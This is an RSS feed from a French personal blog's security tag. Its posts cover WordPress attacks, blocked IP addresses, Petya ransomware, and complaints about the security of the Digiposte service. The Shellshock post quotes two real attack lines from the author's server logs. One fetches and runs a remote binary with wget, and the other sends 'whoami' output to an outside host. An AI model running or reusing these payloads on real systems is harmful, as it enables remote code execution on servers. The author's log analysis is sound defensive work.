<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Securite on Blog GoHugo de Fredô : Linux, Proxmox, IA, Trail, Course, Randonnée, Gravel, Ski de Randonnée</title>
    <link>https://move.cyber-neurones.org/tags/securite/</link>
    <description>Recent content in Securite on Blog GoHugo de Fredô : Linux, Proxmox, IA, Trail, Course, Randonnée, Gravel, Ski de Randonnée</description>
    <generator>Hugo</generator>
    <language>fr</language>
    <lastBuildDate>Tue, 30 Apr 2024 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://move.cyber-neurones.org/tags/securite/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Je ne suis pas une data !</title>
      <link>https://move.cyber-neurones.org/post/2024/04/2024-04-30-je-ne-suis-pas-une-data/</link>
      <pubDate>Tue, 30 Apr 2024 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2024/04/2024-04-30-je-ne-suis-pas-une-data/</guid>
      <description>&lt;p&gt;UFC Que Choisir propose une page unique pour demander le retrait de ses données personnelles face aux démarcheurs et revendeurs de prospects : &lt;a href=&#34;https://www.respectemesdatas.fr/&#34; title=&#34;https://www.respectemesdatas.fr/&#34;&gt;https://www.respectemesdatas.fr/&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Wordpress : Liste des IP que j&#39;ai bloqué</title>
      <link>https://move.cyber-neurones.org/post/2018/11/2018-11-04-wordpress-liste-des-ip-que-jai-bloque/</link>
      <pubDate>Sun, 04 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2018/11/2018-11-04-wordpress-liste-des-ip-que-jai-bloque/</guid>
      <description>&lt;p&gt;Voici la liste des IP que j&amp;rsquo;ai complètement bloqué, trop d&amp;rsquo;attaque :&lt;/p&gt;&#xA;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;91.200.12.114 (Ukraine)&#xA;91.200.12.65 (Ukraine)&#xA;91.200.12.4 (Ukraine) &#xA;178.89.110.135 (Kazakhstan)&#xA;122.114.251.82 (Chine)&#xA;222.86.214.132 (Chine)&#xA;192.99.63.202 (Canada)&#xA;112.78.5.70 (Vietnam)&#xA;81.177.135.161&#xA;221.2.137.143&lt;/code&gt;&lt;/pre&gt;</description>
    </item>
    <item>
      <title>Après #WannaCry ... bonjours à #Petya ! Merci Windows pour toute cette sécurité ...</title>
      <link>https://move.cyber-neurones.org/post/2017/06/2017-06-27-apres-wannacry-bonjours-a-petya-merci-windows-pour-toute-cette-securite/</link>
      <pubDate>Tue, 27 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2017/06/2017-06-27-apres-wannacry-bonjours-a-petya-merci-windows-pour-toute-cette-securite/</guid>
      <description>&lt;p&gt;Les premiers articles sortent :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.francetvinfo.fr/internet/securite-sur-internet/cyberattaques/direct-une-cyberattaque-mondiale-frappe-entreprises-et-administrations_2257807.html&#34;&gt;http://www.francetvinfo.fr/internet/securite-sur-internet/cyberattaques/direct-une-cyberattaque-mondiale-frappe-entreprises-et-administrations_2257807.html&lt;/a&gt; &lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.cert.ssi.gouv.fr/site/CERTFR-2017-ALE-012.pdf&#34;&gt;http://www.cert.ssi.gouv.fr/site/CERTFR-2017-ALE-012.pdf&lt;/a&gt;&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ssi.gouv.fr/actualite/alerte-campagne-de-rancongiciel-3/&#34;&gt;https://www.ssi.gouv.fr/actualite/alerte-campagne-de-rancongiciel-3/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Référence  : CERTFR-2017-ALE-012 : &lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Faire la mise à jour :Microsoft &lt;strong&gt;MS17-010&lt;/strong&gt; :&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://technet.microsoft.com/fr-fr/library/security/ms17-010.aspx&#34;&gt;https://technet.microsoft.com/fr-fr/library/security/ms17-010.aspx&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Une fois encore c&amp;rsquo;est Windows qui est impacté &amp;hellip; les informations que j&amp;rsquo;ai :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Quand le PC affiche ceci il faut le rebooter car contrairement a ce qu&amp;rsquo;il marque il est en cours d&amp;rsquo;encryption (ensuite il faudra mettre le disque sur une autre machine):&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://www.cyber-neurones.org/wp-content/uploads/2017/06/ddwxcfww0aa6pwd.jpg&#34;&gt;&lt;img src=&#34;images/ddwxcfww0aa6pwd.jpg&#34; alt=&#34;&#34;&gt;&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;Le message qui apparait à la fin de l&amp;rsquo;encryption :&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://www.cyber-neurones.org/wp-content/uploads/2017/06/ddwrn3nxcaeclui.jpg&#34;&gt;&lt;img src=&#34;images/ddwrn3nxcaeclui.jpg&#34; alt=&#34;&#34;&gt;&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;Il faut supprimer cette signature (&lt;strong&gt;information à confirmer&lt;/strong&gt;)&lt;a href=&#34;https://www.cyber-neurones.org/wp-content/uploads/2017/06/ddwdumruiaafoyz.jpg&#34;&gt;&lt;img src=&#34;images/ddwdumruiaafoyz-1024x1009.jpg&#34; alt=&#34;&#34;&gt;&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Il semblerait aussi qu&amp;rsquo;il y ait un fichier &lt;strong&gt;perfc.dat&lt;/strong&gt; ou &lt;strong&gt;dllhost.dat&lt;/strong&gt; ou &lt;strong&gt;perfc&lt;/strong&gt; sous &lt;strong&gt;C:/Windows/&lt;/strong&gt; à supprimer (et non perfc.dll) . &lt;strong&gt;Cette information est aussi à confirmer.&lt;/strong&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>Digiposte : je veux plus de sécurité !</title>
      <link>https://move.cyber-neurones.org/post/2017/01/2017-01-05-digiposte-je-veux-plus-de-securite/</link>
      <pubDate>Thu, 05 Jan 2017 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2017/01/2017-01-05-digiposte-je-veux-plus-de-securite/</guid>
      <description>&lt;p&gt;J&amp;rsquo;ai reçu l&amp;rsquo;email de Digiposte :&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;En 2016, Digiposte s’est enrichi de plus de 350 organismes. Démarrez 2017 du bon pied en regroupant vos relevés, attestations et factures dans Digiposte.&lt;/p&gt;&#xA;&lt;p&gt;BESOIN DE PARTAGER VOTRE RIB AVEC UN PROCHE ? CONNECTEZ-VOUS À DIGIPOSTE.&lt;/p&gt;&lt;/blockquote&gt;&#xA;&lt;p&gt;Mais c&amp;rsquo;est vraiment n&amp;rsquo;importe quoi &amp;hellip; il faut travailler sur la sécurité !&lt;/p&gt;&#xA;&lt;p&gt;Il faut mettre en place :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;une &lt;strong&gt;double authentification&lt;/strong&gt; comme le fait Google+ ou Facebook, alors que eux n&amp;rsquo;ont pas mon RIB. (optionnel &amp;amp; uniquement pour les abonnés)&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;une interface pour voir les heures, dates, IP, navigateur&lt;/strong&gt; de toutes les connexions. Comme le fait Google, Facebook, &amp;hellip;&lt;/li&gt;&#xA;&lt;li&gt;l&amp;rsquo;envoi d&amp;rsquo;un &lt;strong&gt;email a chaque nouvelle connexion&lt;/strong&gt; &amp;hellip; comme le fait Google, Facebook, &amp;hellip; (optionnel)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;strong&gt;On ne peut pas mettre des documents plus important que sur Facebook, Google, Twitter, et avoir une sécurité moindre.&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Wordfence, mon analyse des attaques &#34;brute force&#34;</title>
      <link>https://move.cyber-neurones.org/post/2016/12/2016-12-20-wordfence-mon-analyse-des-attaques-brute-force/</link>
      <pubDate>Tue, 20 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2016/12/2016-12-20-wordfence-mon-analyse-des-attaques-brute-force/</guid>
      <description>&lt;p&gt;Nouvel email ou plutôt SPAM n°121916 de Wordfence :&lt;/p&gt;&#xA;&lt;table&gt;&#xA;  &lt;thead&gt;&#xA;      &lt;tr&gt;&#xA;          &lt;th&gt;&amp;gt; After our &lt;a href=&#34;https://www.wordfence.com/blog/2016/12/how-to-protect-against-brute-force-attacks/?utm_source=list&amp;amp;utm_campaign=121916&amp;amp;utm_medium=email&#34;&gt;post on Friday&lt;/a&gt; discussing the increase in brute force attacks on WordPress in December, we received a lot of feedback. A few readers reached out to me personally with some additional data. &amp;gt;  &amp;gt; A source in Kiev, Ukraine contacted me and this morning we chatted via Skype about the political and military situation in Ukraine. &amp;gt;  &amp;gt; &lt;a href=&#34;https://www.wordfence.com/blog/2016/12/who-is-really-behind-ukrainian-brute-force-attacks/?utm_source=list&amp;amp;utm_campaign=121916&amp;amp;utm_medium=email&#34;&gt;We published an update a few minutes ago&lt;/a&gt; that shows who is likely behind the attacks and what their motivation might be.&lt;/th&gt;&#xA;      &lt;/tr&gt;&#xA;  &lt;/thead&gt;&#xA;  &lt;tbody&gt;&#xA;  &lt;/tbody&gt;&#xA;&lt;/table&gt;&#xA;&lt;p&gt;Maintenant il faut vérifier les faits, est-ce que je me fais attaquer par les Russes :&lt;/p&gt;</description>
    </item>
    <item>
      <title>Wordpress : Sécurité</title>
      <link>https://move.cyber-neurones.org/post/2016/12/2016-12-20-wordpress-securite/</link>
      <pubDate>Tue, 20 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2016/12/2016-12-20-wordpress-securite/</guid>
      <description>&lt;p&gt;La sécurité passe aussi par l&amp;rsquo;analyse des logs d&amp;rsquo;Apache !&lt;/p&gt;&#xA;&lt;p&gt;Je viens de faire deux POST sur la sécurité :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-des-attaques-brute-force/&#34;&gt;https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-des-attaques-brute-force/&lt;/a&gt; : Mon analyse des attaques &amp;ldquo;Burte force&amp;rdquo;&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-a-partir-des-logs-dapache-des-attaques-par-injection-sql/&#34;&gt;https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-a-partir-des-logs-dapache-des-attaques-par-injection-sql/&lt;/a&gt; : Mon analyse à partir des logs d’Apache des attaques par injection SQL en méthode GET.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Attention a ne pas négliger la sécurité sur Wordpress ! Il existe de bon plugin pour la sécurité :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Word fence Security&lt;/strong&gt;. Version 6.2.8 | Par &lt;a href=&#34;http://www.wordfence.com/&#34;&gt;Wordfence&lt;/a&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Email a chaque connexion.&lt;/li&gt;&#xA;&lt;li&gt;Email a chaque recommandation de mise à jour.&lt;/li&gt;&#xA;&lt;li&gt;Diagnostic.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;All In One WP Security&lt;/strong&gt;. Version 4.2.4 | Par &lt;a href=&#34;https://www.tipsandtricks-hq.com/&#34;&gt;Tips and Tricks HQ, Peter, Ruhul, Ivy&lt;/a&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Filtre IP : Liste notre .&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Captcha by BestWebSoft&lt;/strong&gt;. Version 4.2.8 | Par &lt;a href=&#34;http://bestwebsoft.com/&#34;&gt;BestWebSoft&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;WP-SpamShield&lt;/strong&gt;. Version 1.9.9.8 | Par &lt;a href=&#34;https://www.redsandmarketing.com/&#34;&gt;Scott Allen&lt;/a&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Eviter le SPAM dans les commentaires.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Juste pour bien ce rendre compte, voici la commande pour voir le nombre d&amp;rsquo;attaques &amp;ldquo;Brute force&amp;rdquo; (voir le précédent post pour la création du fichier wp-login.txt). Certains jours on arrive a des nombres de connexions très important !&lt;/p&gt;</description>
    </item>
    <item>
      <title>Digiposte&#43; : Beaucoup de progrès mais pas sur la sécurité !</title>
      <link>https://move.cyber-neurones.org/post/2016/11/2016-11-19-digiposte-beaucoup-de-progres-mais-pas-sur-la-securite/</link>
      <pubDate>Sat, 19 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2016/11/2016-11-19-digiposte-beaucoup-de-progres-mais-pas-sur-la-securite/</guid>
      <description>&lt;p&gt;Beaucoup de progrès ont été fait sur &lt;strong&gt;Digiposte+&lt;/strong&gt; (#digiposte #digiposte+), maintenant il y a énormément de commerçants et bientôt il y aura la certification de diplôme. &lt;strong&gt;Mais le point noir c&amp;rsquo;est toujours la sécurité&lt;/strong&gt;. La sécurité doit être supérieur à celle de Google ou même de Facebook ! Comment peut-on envisager de voir une copie de sa carte d&amp;rsquo;identité ou de son bulletin de paye dans les mains d&amp;rsquo;autres personnes.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Digiposte : un bon service mais perfectible</title>
      <link>https://move.cyber-neurones.org/post/2014/12/2014-12-03-digiposte-un-bon-service-mais-perfectible/</link>
      <pubDate>Wed, 03 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2014/12/2014-12-03-digiposte-un-bon-service-mais-perfectible/</guid>
      <description>&lt;p&gt;Digiposte est un service de &lt;a href=&#34;http://fr.wikipedia.org/wiki/Coffre-fort_num%C3%A9rique&#34;&gt;coffre-fort électronique (ou numérique)&lt;/a&gt;. J&amp;rsquo;ai testé ce service Digiposte : &lt;a href=&#34;https://www.digiposte.fr&#34;&gt;https://www.digiposte.fr/&lt;/a&gt; c&amp;rsquo;est un bon service mais il me semble qu&amp;rsquo;il y a quelques manques :&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Le nombre de sites utilisant ce service n&amp;rsquo;est pas encore assez important. Mais les principaux acteurs sont présents ce qui est très bien. Ceux sont les banques qui sont les grandes absentes &amp;hellip; Il est clair que La Poste est en concurrence avec des banques vu que c&amp;rsquo;est une banque, en plus certaines banques comme la caisse d&amp;rsquo;épargne a déjà un service de coffre fort électronique mais payant, et d&amp;rsquo;autres banques comme AXA Banque font payer les relevés &amp;hellip;Mais le plus important c&amp;rsquo;est d&amp;rsquo;intégrer un maximum de site, Google a très bien compris cela et il essaye toujours d&amp;rsquo;être le plus ouvert possible. A noter aussi que pour l&amp;rsquo;Apple Store on ne peut pas vraiment dire que cela fonctionne bien. &lt;strong&gt;Très important&lt;/strong&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Les plus grandes banques en France :&#xA;&lt;ol&gt;&#xA;&lt;li&gt;BNP Paribas : absent.&lt;/li&gt;&#xA;&lt;li&gt;Les caisses d&amp;rsquo;épargne : absent.&lt;/li&gt;&#xA;&lt;li&gt;Crédit agricole : absent.&lt;/li&gt;&#xA;&lt;li&gt;AXA Banque : absent.&lt;/li&gt;&#xA;&lt;li&gt;Société générale : absent.&lt;/li&gt;&#xA;&lt;li&gt;CIC / Crédit mutuel : présent.&lt;/li&gt;&#xA;&lt;li&gt;La poste : présent :).&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;Au niveau des services il manque :&#xA;&lt;ol&gt;&#xA;&lt;li&gt;&lt;a href=&#34;http://www.digitick.com&#34;&gt;digitick.com&lt;/a&gt; : Vente de billet.&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;http://www.phpnet.org%20&#34;&gt;phpnet.org&lt;/a&gt; : Hébergeur, le meilleur.&lt;/li&gt;&#xA;&lt;li&gt;Gaumont : Vente de billet.&lt;/li&gt;&#xA;&lt;li&gt;Pixmania :&lt;/li&gt;&#xA;&lt;li&gt;Décathlon :&lt;/li&gt;&#xA;&lt;li&gt;&amp;hellip;.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;Il faudrait le calcul d&amp;rsquo;un checksum sur chaque fichier afin que l&amp;rsquo;utilisateur puisse voir si le fichier est en doublon. Avec un système à &amp;ldquo;plat&amp;rdquo; il est très facile d&amp;rsquo;avoir des doublons de fichiers. Ensuite, c&amp;rsquo;est à l&amp;rsquo;utilisateur de prendre la décision de garder ou supprimer le fichier. &lt;strong&gt;Très important&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;Ajouter un &lt;strong&gt;colonne date modifiable&lt;/strong&gt; par l&amp;rsquo;utilisateur, par exemple la date du scan n&amp;rsquo;est pas la date du document qui est scanné. En fait, il faudrait deux dates: date de dépôt du fichier et date d&amp;rsquo;édition du fichier (modifiable quand c&amp;rsquo;est déposé par l&amp;rsquo;utilisateur). &lt;strong&gt;Très important&lt;/strong&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Voici les colonnes actuellement disponible :&lt;a href=&#34;https://www.cyber-neurones.org/wp-content/uploads/2014/12/cyber-neurones_capture-d%E2%80%99ecran-2014-12-03-a-19.45.41.png&#34;&gt;&lt;img src=&#34;images/cyber-neurones_capture-d%E2%80%99ecran-2014-12-03-a-19.45.41.png&#34; alt=&#34;Capture d’écran 2014-12-03 à 19.45.41&#34;&gt;&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;il serait bien d&amp;rsquo;avoir une &amp;ldquo;preview&amp;rdquo; des fichiers. &lt;strong&gt;A faire&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;application IPhone est minimaliste, on a du mal à faire une recherche &amp;hellip;&lt;strong&gt;A faire&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;Pour l&amp;rsquo;application IPad cela serait bien d&amp;rsquo;avoir un système qui permette la &lt;strong&gt;synchronisation&lt;/strong&gt; des fichiers et pas seulement la visualisation. Cela permet de pouvoir disposer des fichiers en mode &amp;ldquo;&lt;strong&gt;Offline&lt;/strong&gt;&amp;quot;. &lt;strong&gt;Important&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;ajout du &lt;strong&gt;type de document&lt;/strong&gt; dans les colonnes serait aussi un plus, actuellement il existe seulement Facture &amp;amp; relevé et c&amp;rsquo;est uniquement quand c&amp;rsquo;est un tiers qui transmet : (&lt;strong&gt;Important&lt;/strong&gt;)&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Facture, ( Commerces )&lt;/li&gt;&#xA;&lt;li&gt;Relevé, ( Relevé Bancaire, Relevé de téléphone)&lt;/li&gt;&#xA;&lt;li&gt;Licence, ( Licence de sport )&lt;/li&gt;&#xA;&lt;li&gt;Photo, ( Pour Digishoot )&lt;/li&gt;&#xA;&lt;li&gt;Diplome, ( Diplome, Examen)&lt;/li&gt;&#xA;&lt;li&gt;Permis, ( Permis de conduire, Permis de bateau, &amp;hellip; )&lt;/li&gt;&#xA;&lt;li&gt;Contrôle, ( Contrôle technique, )&lt;/li&gt;&#xA;&lt;li&gt;Identité, ( CNI , Carte grise, Passeport )&lt;/li&gt;&#xA;&lt;li&gt;Billet, ( Par exemple : billet d&amp;rsquo;avion, place avec QR-Code )&lt;/li&gt;&#xA;&lt;li&gt;Garantie, ( Garanti )&lt;/li&gt;&#xA;&lt;li&gt;Attestation, ( Attestation d&amp;rsquo;emploi, Attestation de sport, Attestation de mutuelle)&lt;/li&gt;&#xA;&lt;li&gt;Devis, ( Devis )&lt;/li&gt;&#xA;&lt;li&gt;Acompte, (Acompte )&lt;/li&gt;&#xA;&lt;li&gt;Courrier, ( Lettre importante )&lt;/li&gt;&#xA;&lt;li&gt;Acte, (Acte notarié )&lt;/li&gt;&#xA;&lt;li&gt;Comptabilité, ( Pour les personnes qui ont des entreprises ou SCI ou les auto-entrepreneurs )&lt;/li&gt;&#xA;&lt;li&gt;Paie ( Feuille de paye )&lt;/li&gt;&#xA;&lt;li&gt;Listes ( Carnet d&amp;rsquo;adresse, Listes diverses ).&lt;/li&gt;&#xA;&lt;li&gt;Santé ( Examen ).&lt;/li&gt;&#xA;&lt;li&gt;Facture Client ( Pour les auto-entrepreneurs ).&lt;/li&gt;&#xA;&lt;li&gt;Numéro de série ( Pour avoir le numéro de sérié de ce que l&amp;rsquo;on a acheté, le plus pratique étant de faire une photo de la boite lors de l&amp;rsquo;achat).&lt;/li&gt;&#xA;&lt;li&gt;Capture ( Un peu comme DigiShoot , un service de capture de site Web avec date de la capture par un Tiers , une sorte de &lt;strong&gt;DigiWeb .&lt;/strong&gt; Mais bon cela serait un peu complexe si c&amp;rsquo;est sur Facebook , s&amp;rsquo;il y a besoin d&amp;rsquo;une authentification )&lt;/li&gt;&#xA;&lt;li&gt;Agenda ( Pour Nicolas &amp;hellip; certain garde leur agenda)&lt;/li&gt;&#xA;&lt;li&gt;Autres (Pour les personnes voulant faire de l&amp;rsquo;archivage de document personnel comme des photos de vacance ou autres ).&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;Que l&amp;rsquo;application &lt;a href=&#34;https://www.digiposte.fr/decouverte/digishoot-photographiez-certifiez&#34;&gt;&lt;strong&gt;Digishoot&lt;/strong&gt;&lt;/a&gt; soit gratuite (je sais j&amp;rsquo;abuse), actuellement ce service est gratuit dans d&amp;rsquo;autres assurances. Je trouve que cette application peut être utile : &lt;strong&gt;A faire&lt;/strong&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;en cas de sinistre,&lt;/li&gt;&#xA;&lt;li&gt;en cas de construction (affichage du permis),&lt;/li&gt;&#xA;&lt;li&gt;pour les associations qui veulent faire constater,&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;Avoir une notification quand on partage un document et que la personne y accède. &lt;strong&gt;A faire&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;ajout de la &lt;strong&gt;colonne taille&lt;/strong&gt; . Quand on veut faire du ménage c&amp;rsquo;est pratique de commencer à supprimer les plus volumineux. &lt;strong&gt;A faire&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;ajout de la &lt;strong&gt;colonne date fin de validité (facultative)&lt;/strong&gt;, pour par exemple : les garantis, le contrôle technique, les CNI, &amp;hellip;Le jours avant la fin de validité on reçoit un email. Cela permet de supprimer le document. &lt;strong&gt;Important&lt;/strong&gt;.&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;ajout d&amp;rsquo;une personne (email + adresse : pour livraison d&amp;rsquo;un CD-ROM) dans les paramètres afin que le compte puisse être céder à un tiers en cas de décès. On va dire que c&amp;rsquo;est une option &amp;ldquo;testamentaire&amp;rdquo;, qui serait facultative. &lt;strong&gt;Important&lt;/strong&gt;.&lt;/li&gt;&#xA;&lt;li&gt;L&amp;rsquo;ajout d&amp;rsquo;une &lt;strong&gt;colonne ID unique&lt;/strong&gt;, qui permet de faire un lien entre une application cliente et Digiposte. Le plus important quand on développe un service c&amp;rsquo;est de l&amp;rsquo;ouvrir un maximum afin de permettre une intégration facile (voir les produits Google). &lt;strong&gt;A faire.&lt;/strong&gt;&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;Malgré tous les points à corriger, je pense que ce type d&amp;rsquo;application à de l&amp;rsquo;avenir. Il faudrait que le service se rémunère sur l&amp;rsquo;espace disque utilisé. Ou alors offre des services qui serait&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sécurité : shellshock ...</title>
      <link>https://move.cyber-neurones.org/post/2014/11/2014-11-06-securite-shellshock/</link>
      <pubDate>Thu, 06 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://move.cyber-neurones.org/post/2014/11/2014-11-06-securite-shellshock/</guid>
      <description>&lt;p&gt;Attaque sur mon serveur :&lt;/p&gt;&#xA;&lt;table&gt;&#xA;  &lt;thead&gt;&#xA;      &lt;tr&gt;&#xA;          &lt;th&gt;WinInet Test&lt;/th&gt;&#xA;          &lt;th&gt;&lt;/th&gt;&#xA;          &lt;th&gt;&lt;/th&gt;&#xA;          &lt;th&gt;&lt;/th&gt;&#xA;          &lt;th&gt;&lt;/th&gt;&#xA;      &lt;/tr&gt;&#xA;  &lt;/thead&gt;&#xA;  &lt;tbody&gt;&#xA;      &lt;tr&gt;&#xA;          &lt;td&gt;curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.6.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;cURL&lt;/td&gt;&#xA;      &lt;/tr&gt;&#xA;      &lt;tr&gt;&#xA;          &lt;td&gt;&lt;strong&gt;() { :;}; /bin/bash -c&lt;/strong&gt; \\&amp;quot;&lt;strong&gt;wget &lt;a href=&#34;http://ntontomou.com/s&#34;&gt;http://ntontomou.com/s&lt;/a&gt; ;chmod +x s ; ./s\\&lt;/strong&gt;&amp;quot;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;          &lt;td&gt;&lt;/td&gt;&#xA;      &lt;/tr&gt;&#xA;  &lt;/tbody&gt;&#xA;&lt;/table&gt;&#xA;&lt;p&gt;Un petit Whois sur : &lt;a href=&#34;http://www.ntontomou.com/&#34;&gt;http://www.ntontomou.com/&lt;/a&gt; : https://who.is/whois/ntontomou.com &amp;hellip;. il reste plus qu&amp;rsquo;a contacter &lt;a href=&#34;http://www.enom.com&#34;&gt;http://www.enom.com&lt;/a&gt;. Misère.&lt;/p&gt;&#xA;&lt;p&gt;D&amp;rsquo;après les logs c&amp;rsquo;est pas son premier essai :&lt;/p&gt;&#xA;&lt;p&gt;() { :;}; /bin/bash -c \&amp;ldquo;curl &lt;a href=&#34;http://ntontomou.com/custom/ping.php?domain=sphinux.org&#34;&gt;http://ntontomou.com/custom/ping.php?domain=sphinux.org&lt;/a&gt;\\&amp;amp;whoami=`whoami`\&amp;rdquo;&lt;/p&gt;&#xA;&lt;p&gt;D&amp;rsquo;abord du PHP puis maintenant un soft en C.&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
